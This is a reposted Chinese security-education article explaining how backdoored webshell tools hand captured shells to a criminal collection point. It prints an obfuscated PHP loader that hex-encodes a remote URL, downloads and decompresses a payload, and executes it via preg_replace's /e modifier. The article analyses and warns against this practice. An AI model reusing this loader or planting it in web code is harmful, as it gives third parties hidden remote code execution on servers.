安基网 首页 安全 安全学院 查看内容

揭秘网络黑吃黑产业之"后门箱子"

2020-6-19 15:22| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 在一些渗透测试中,往往会用到各种大马,小马,一句话,菜刀等等……但是你们有想过这些工具会存在后门吗?何为webshellwebshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序,可以上传下载等等一系列操作,而大小马则是这个管理程序的 ...

在一些渗透测试中,往往会用到各种大马,小马,一句话,菜刀等等……但是你们有想过这些工具会存在后门吗?

何为webshell

webshell的获取一般要跟大马小马这些挂上一个√(就算是命令执行也需要shell)。webshell简单理解就是网站的一个管理程序,可以上传下载等等一系列操作,而大小马则是这个管理程序的代码。

关于后门

一般存在后门的话,所获得的shell会通过后门发送给箱子,那个箱子就是用来装shell的地方!

举个例子

error_reporting(0);

session_start();

header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))

$_SESSION['api']=substr(file_get_contents(

sprintf('%s?%s',pack("H*",

'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

?>

这里我们主要看

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这串代码看起来可能平平无奇,但是执行过后其实是一张箱子的图片地址,这个地址我就不放出来了,有兴趣的可以自己搭建解密!这个图片还需要调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真正的代码。最后调用preg_replace的修饰符e来执行恶意代码。然后,shell就被装进箱子里了。

黑吃黑是怎么形成的

其实网络安全圈子里定义一直模糊,有人兢兢业业挖洞,做src;有人背地里干违法勾当,赚黑心钱。天天在群里秀,挖洞的一部分人就会想

同样是技术,那凭什么我的付出和收入没有他做一单高?就受不住诱惑投入黑产了。殊不知在群里秀的那群人,早已喝茶去了……

极少数违法分子就觉得自己挖太危险了,重新换个思路:

提供大小马之类的工具,再写上一句免责声明,加个后门,想着坐等shell进账出售,出了事也不会被追究。毕竟后门代码一般小白还真不会去管,他们胆子大,技术差。这里奉劝萌新小白们别做事不经大脑思考,盲目炫技最后只能进去喝透心凉茶!!!

这伙人写好了后门,疯狂推广,进账,然后被抓…

违法犯罪得事一定不能做!

这就是黑吃黑产业链了,他们背后链接的产业咋们下期再说!

也希望各位网络安全爱好者,同行,且行且珍惜,莫做违法事!制作不易点个赞再走吧!靓仔!

#网络安全在我身边#



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6839626232846352911/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部